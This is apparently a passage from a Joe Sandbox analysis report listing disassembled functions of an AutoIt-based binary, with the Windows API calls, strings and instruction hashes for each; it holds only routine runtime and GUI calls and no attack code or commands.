                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00E8393A
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E83954
                                                        • _wcslen.LIBCMT ref: 00E83999
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E839C6
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E839F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcslen
                                                        • String ID: SysListView32
                                                        • API String ID: 2147712094-78025650
                                                        • Opcode ID: a25c716def6761849bdd31a450718d8838573dd5b3664dedfeafa61ba0abe1d9
                                                        • Instruction ID: f7541c87c92ef4175cfee98ff90fff508cd5a63b8a091b079304600bfcddc308
                                                        • Opcode Fuzzy Hash: a25c716def6761849bdd31a450718d8838573dd5b3664dedfeafa61ba0abe1d9
                                                        • Instruction Fuzzy Hash: 2341BF71A00218ABEB21AF64CC49FEA7BA9EF48754F101526F95CF7281D771DA84CB90
                                                        Function 00E5BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E5BCFD
                                                        • IsMenu.USER32(00000000), ref: 00E5BD1D
                                                        • CreatePopupMenu.USER32 ref: 00E5BD53
                                                        • GetMenuItemCount.USER32(01044868), ref: 00E5BDA4
                                                        • InsertMenuItemW.USER32(01044868,?,00000001,00000030), ref: 00E5BDCC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                        • String ID: 0$2
                                                        • API String ID: 93392585-3793063076
                                                        • Opcode ID: a0acf5a5bf026c6174d14d024ffc02a9e4f80f6b48c3e9fa839e22d1ae77eb0c
                                                        • Instruction ID: e1e63982cadbe09c37935697d51aed140bf8e1734bab6968aec59e0d72bb8294
                                                        • Opcode Fuzzy Hash: a0acf5a5bf026c6174d14d024ffc02a9e4f80f6b48c3e9fa839e22d1ae77eb0c
                                                        • Instruction Fuzzy Hash: 4B51AD70A002099FDF10CFA9D888BAEBBF4BF4531AF245919ED15F7290D7709948CB61
                                                        Function 00E12D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 00E12D4B
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00E12D53
                                                        • _ValidateLocalCookies.LIBCMT ref: 00E12DE1
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00E12E0C
                                                        • _ValidateLocalCookies.LIBCMT ref: 00E12E61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: &H$csm
                                                        • API String ID: 1170836740-1242228090
                                                        • Opcode ID: f8a0effb752dba4f9e30d66893a75f64ff95441bc357cd7c9b7c674d5ecdd71f
                                                        • Instruction ID: 67b5891a32335e4e8a31d1b149d08eba08aa2e75ad6c1ac495a1e86ad7e2835a
                                                        • Opcode Fuzzy Hash: f8a0effb752dba4f9e30d66893a75f64ff95441bc357cd7c9b7c674d5ecdd71f
                                                        • Instruction Fuzzy Hash: 5341C234A00208AFCF14DF68DC45ADEBBB4BF44328F149159EA147B392D731AAA5CBD0
                                                        Function 00E5C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00E5C913
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: 59b7101e1ae401f885e3dbfbd0f3ed23f2f98d3b877ac19f015db37a885e4486
                                                        • Instruction ID: b5bf657770e1129c49206e9a785af1bd62307bb1ccb4aaa4102f542ae8c44c7f
                                                        • Opcode Fuzzy Hash: 59b7101e1ae401f885e3dbfbd0f3ed23f2f98d3b877ac19f015db37a885e4486
                                                        • Instruction Fuzzy Hash: 03112732689306BEE7059B14DC92CEB67DCDF1571AB30242BF904B62C2EBB46E445264
                                                        Function 00E5ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$LocalTime
                                                        • String ID:
                                                        • API String ID: 952045576-0
                                                        • Opcode ID: f1c7f69ea09eafd634dcbe251ade4e459b18b9daeeb7495b648d8bd31dd8b34b
                                                        • Instruction ID: e4deb5a21a0a8d0492a9ee1bfb681820977e9672d1fe15fe3a8888c487d160e7
                                                        • Opcode Fuzzy Hash: f1c7f69ea09eafd634dcbe251ade4e459b18b9daeeb7495b648d8bd31dd8b34b
                                                        • Instruction Fuzzy Hash: 47414275C1011865CB11EBB48C8A9CFB7ECAF45710F50A966E924F3262FB34D395C3A5
                                                        Function 00E0F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E4682C,00000004,00000000,00000000), ref: 00E0F953
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00E4682C,00000004,00000000,00000000), ref: 00E4F3D1
                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E4682C,00000004,00000000,00000000), ref: 00E4F454
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 5b64d61b1ca22127afe2c3729e891880a9f09ef068b484e67a73f94ea1ea59e0
                                                        • Instruction ID: 094f56d9cb36afd81e7e32b4d877702322cc8cbd5fc839aa7566e152392d7f12
                                                        • Opcode Fuzzy Hash: 5b64d61b1ca22127afe2c3729e891880a9f09ef068b484e67a73f94ea1ea59e0
                                                        • Instruction Fuzzy Hash: 5B413D31608680BEC7398F79D888B6A7B91ABD6718F94703DE04B72DE1C672E8D5C711
                                                        Function 00E82D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00E82D1B
                                                        • GetDC.USER32(00000000), ref: 00E82D23
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E82D2E
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00E82D3A
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E82D76
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E82D87
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E85A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00E82DC2
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E82DE1
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: abc51862714af55a8f4bae131d1564a3f67a900268bea701848ee59f451d5689
                                                        • Instruction ID: 1fb20fb77f2ea63df8403361f93218ffd3a6aa87a1fa340ef7b0cecf4adc212b
                                                        • Opcode Fuzzy Hash: abc51862714af55a8f4bae131d1564a3f67a900268bea701848ee59f451d5689
                                                        • Instruction Fuzzy Hash: 0B31AB72201210BFEB118F518C8AFEB3FA9EF0A715F144065FE0CAA291D6759C45CBB0
                                                        Function 00E55622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 80be98ef62d664151592ba6fe16fd005c31d71feecd442a0df0ec78b4fed3542
                                                        • Instruction ID: 9545a33753af287961c11518b4c77bc36a04ef94f636b9daafb0a6754ebfb6e1
                                                        • Opcode Fuzzy Hash: 80be98ef62d664151592ba6fe16fd005c31d71feecd442a0df0ec78b4fed3542
                                                        • Instruction Fuzzy Hash: 0121FC73741B0DB7D21465118DA2FFA739CAF1438AF542421FE0D7A541F7A0EE1886A5
                                                        Function 00E74FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: b85da9f1cac5a267d6e4349edd60421662ab1f5f6bbb8baf66437591294cc814
                                                        • Instruction ID: 8b77d9c597b09243b3c386eaedfa8dd6449620b92f4fa9ffec2f973d877bdab8
                                                        • Opcode Fuzzy Hash: b85da9f1cac5a267d6e4349edd60421662ab1f5f6bbb8baf66437591294cc814
                                                        • Instruction Fuzzy Hash: 70D1A272A0060AAFDF10CFA8D881BAEB7B5BF48344F14D469E919BB291D7B0DD45CB50
                                                        Function 00E31522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00E317FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00E315CE
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00E31651
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00E317FB,?,00E317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00E316E4
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00E316FB
                                                          • Part of subcall function 00E23820: RtlAllocateHeap.NTDLL(00000000,?,00EC1444,?,00E0FDF5,?,?,00DFA976,00000010,00EC1440,00DF13FC,?,00DF13C6,?,00DF1129), ref: 00E23852
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00E317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00E31777
                                                        • __freea.LIBCMT ref: 00E317A2
                                                        • __freea.LIBCMT ref: 00E317AE
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                        • String ID:
                                                        • API String ID: 2829977744-0
                                                        • Opcode ID: aabaa84c61c9200f2016ab5706dfd8bc80a74c1913f60261938d04e6b62b40a6
                                                        • Instruction ID: db47fa570304ce55de7e8ce704399e372a39be35103db3c09dbe8ab5e913bb76
                                                        • Opcode Fuzzy Hash: aabaa84c61c9200f2016ab5706dfd8bc80a74c1913f60261938d04e6b62b40a6
                                                        • Instruction Fuzzy Hash: 7B91A271E00216AADB248FA4C889AEE7FB5AF49314F18669EE805F7281D735DD44CB60
                                                        Function 00E74523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2610073882-625585964
                                                        • Opcode ID: e9b5253ca25e0b619f1fca6779304170da6a990d371d33e1797cfbe8616b7e4b
                                                        • Instruction ID: 121c16b806723fa7895eb911b9e12fb2295167e8f68331f9a3ed62e26f465494
                                                        • Opcode Fuzzy Hash: e9b5253ca25e0b619f1fca6779304170da6a990d371d33e1797cfbe8616b7e4b
                                                        • Instruction Fuzzy Hash: 4B9180B1A00219ABDF24CFA5C844FAEB7B8EF46714F10955AF519BB2C0D7709945CFA0
                                                        Function 00E61187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00E6125C
                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E61284
                                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00E612A8
                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00E612D8
                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00E6135F
                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00E613C4
                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00E61430
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                        • String ID:
                                                        • API String ID: 2550207440-0
                                                        • Opcode ID: e539a14bdc700f4efe9be92917b2c140df4148fdcb01a06e2fa2b80e454b1728
                                                        • Instruction ID: 74255fe47865083512df262474ee50f1eac7086aaaec77fbad3e591bd9d320e4
                                                        • Opcode Fuzzy Hash: e539a14bdc700f4efe9be92917b2c140df4148fdcb01a06e2fa2b80e454b1728
                                                        • Instruction Fuzzy Hash: CA912271A402089FDB02CFA4E884BBEB7B5FF45354F195069E550F72A1DB74A841CBA0
                                                        Function 00E0948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 2a64bb0164780aa3a2ac574092262b7e26aa3ed5fc15bdb0c8228626ba367747
                                                        • Instruction ID: 8368e5a6564f75a23924a072f0c68cac92c612311613e7f966481978814257e2
                                                        • Opcode Fuzzy Hash: 2a64bb0164780aa3a2ac574092262b7e26aa3ed5fc15bdb0c8228626ba367747
                                                        • Instruction Fuzzy Hash: F6914A71D00219EFCB10CFA9CC84AEEBBB8FF49324F249555E515B7292D374A981CBA0
                                                        Function 00E73947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00E7396B
                                                        • CharUpperBuffW.USER32(?,?), ref: 00E73A7A
                                                        • _wcslen.LIBCMT ref: 00E73A8A
                                                        • VariantClear.OLEAUT32(?), ref: 00E73C1F
                                                          • Part of subcall function 00E60CDF: VariantInit.OLEAUT32(00000000), ref: 00E60D1F
                                                          • Part of subcall function 00E60CDF: VariantCopy.OLEAUT32(?,?), ref: 00E60D28
                                                          • Part of subcall function 00E60CDF: VariantClear.OLEAUT32(?), ref: 00E60D34
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4137639002-1221869570
                                                        • Opcode ID: febf57ed8895658ea884b4045a51bb4c2be745dc8acd2196f709ce579dcecce1
                                                        • Instruction ID: 610b9bd820cc6ebc8e0156e5febd7950b15c0837e3b6667c55812bd218c4f2c5
                                                        • Opcode Fuzzy Hash: febf57ed8895658ea884b4045a51bb4c2be745dc8acd2196f709ce579dcecce1
                                                        • Instruction Fuzzy Hash: F8919B756083059FC704EF24C48196AB7E4FF89314F14982EF88AAB351DB30EE45DBA2
                                                        Function 00E74BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E5000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E4FF41,80070057,?,?,?,00E5035E), ref: 00E5002B
                                                          • Part of subcall function 00E5000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E4FF41,80070057,?,?), ref: 00E50046
                                                          • Part of subcall function 00E5000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E4FF41,80070057,?,?), ref: 00E50054
                                                          • Part of subcall function 00E5000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E4FF41,80070057,?), ref: 00E50064
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00E74C51
                                                        • _wcslen.LIBCMT ref: 00E74D59
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00E74DCF
                                                        • CoTaskMemFree.OLE32(?), ref: 00E74DDA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 614568839-2785691316
                                                        • Opcode ID: e0ffa8de45011af9abf04345b16c9b3564893d1c1255aa7ed7db3bfe0381460b
                                                        • Instruction ID: 5efafe75ef61b49525d57d3d52bfe561a6591edd46402c07d9c27e1bc6091bb7
